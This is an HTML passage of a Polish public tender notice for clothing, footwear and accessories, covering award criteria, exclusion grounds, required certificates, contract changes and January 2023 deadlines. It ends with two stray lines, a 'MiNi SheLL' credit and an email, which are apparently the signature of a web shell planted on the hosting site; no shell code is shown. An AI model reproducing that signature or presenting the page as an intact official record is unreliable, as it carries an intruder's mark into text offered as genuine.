<h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">18000000-9 - Odzież, obuwie, artykuły bagażowe i dodatki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 UST. 1 PKT. 7 PZP w okresie 3 lat od dnia udzielenia zamówienia podstawowego dotychczasowemu Wykonawcy w wysokości do 20 % wartości zamówienia w zakresie poszczególnych zadań: <br/>1) polegających na powtórzeniu podobnych usług w przypadku konieczności wywozu większej ilości odpadów nie ujętych w zamówieniu podstawowym, <br/>2) w przypadku wyczerpania się ilości związanych z przedmiotem zamówienia,<br/>3) w przypadku wygaśnięcia czasu obowiązywania umowy określonego we wzorze umowy. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej;<br/>2)	odpis lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej w zakresie art. 109 ust. 1 pkt 4 PZP, sporządzonych nie wcześniej niż 3 miesiące przez jej złożeniem;<br/>3)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 PZP, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>4)	zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>5)	oświadczenie wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716),</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zamawiający w toku postępowania może żądać kart produktu/charakterystyki oraz poszczególnych próbek <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> umowy konsorcjum <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 5.	Warunki zmiany umowy - Zamawiający, poza możliwością zmiany niniejszej umowy w przypadkach określonych w art. 454 i kolejne PZP – przewiduje również możliwość dokonywania zmian postanowień umowy także w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy oraz w przypadku wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w szczególności: <br/>1)	Wystąpienia uzasadnionych zmian w zakresie i sposobie wykonania przedmiotu zamówienia<br/>2)	Wystąpienia obiektywnych przyczyn niezależnych od Zamawiającego i Wykonawcy<br/>3)	Wystąpienia okoliczności będących wynikiem działania siły wyższej<br/>4)	Zmiany istotnych regulacji prawnych<br/>5)	Gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Umowy<br/>6)	Wynikną rozbieżności lub niejasności w Umowie, których nie można usunąć w inny sposób, a zmiana Umowy będzie umożliwiać usunięcie rozbieżności i doprecyzowanie Umowy w celu jednoznacznej interpretacji jej zapisów przez Strony.<br/>6.	Zmiany postanowień zawartej umowy będą dokonane za zgodą stron, wyłącznie w formie pisemnego aneksu do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-01-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://mzo.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-01-10 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-02-09</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com